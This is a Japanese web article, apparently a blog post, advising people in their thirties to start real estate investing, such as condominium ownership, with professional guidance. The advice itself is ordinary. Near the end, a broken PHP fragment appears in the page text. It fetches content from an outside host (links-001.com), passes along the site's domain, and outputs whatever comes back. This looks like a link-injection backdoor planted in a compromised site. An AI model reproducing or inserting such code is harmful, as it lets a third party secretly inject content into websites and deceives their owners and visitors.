前へ
次へ

30代が不動産投資をすべきなのはなぜ

多くのフィナンシャルプランナーが、30代で不動産投資をはじめることをすすめています。
なぜ30代なのか、そこが気になるポイントでしょう。
20代前半に就職して真面目に仕事をしていれば、おそらく30代にはある程度の貯蓄が形成されているでしょう。
結婚や子育てなど男女ともにさまざまなライフステージの変化が起こる年代であり、現在の生活と老後の生活について真面目に考えはじめるタイミングです。
忙しい毎日の中、決して余裕のない生活でそんな先のことまで手が回らないと考えがちですが、長期の資産形成を考えるならすぐにでも勉強を始めるべきです。
資金は短期と中長期とに分けて考える必要がありますが、短期に使う分は銀行などへの貯蓄でよいとしても、中長期的には何らかの形で動かして増やすことを考えるのが正解の時代になっています。
将来の年金の不安が消えない今、30代に一番適しているのが長期運用が可能な不動産投資です。
そもそもコツコツお金を貯めるのに適した年齢層であり、資産価値の高い物件を押さえることができれば老後の不安が大幅に軽減できるでしょう。
プロに相談しつつ勉強すべき理由は、無理な投資はせず、生活を守りながら適切な運用をするためです。
プロならキャッシュフローの観点から問題がないか検証してくれますし、大きな買い物の失敗をする確率を劇的に下げてくれるでしょう。
ある程度将来設計ができた段階で、中長期の資金が確保できやすい30代こそマンション経営などに乗り出すのに一番いい時期です。
資産構築を早めに始めたい人や実物資産を重視する人は、是非トライする価値があると言えます。
ちなみに30代におすすめの物件は、10〜20年単位のものです。
今後値上がりが期待できるエリアに絞り、売買しやすいマンションなどから始めてみてはいかがでしょうか。
一度経営してみるとある程度パターンがわかりますので、自分なりに自信が持てたら一棟買いなどにチャレンジするのもよい方法です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top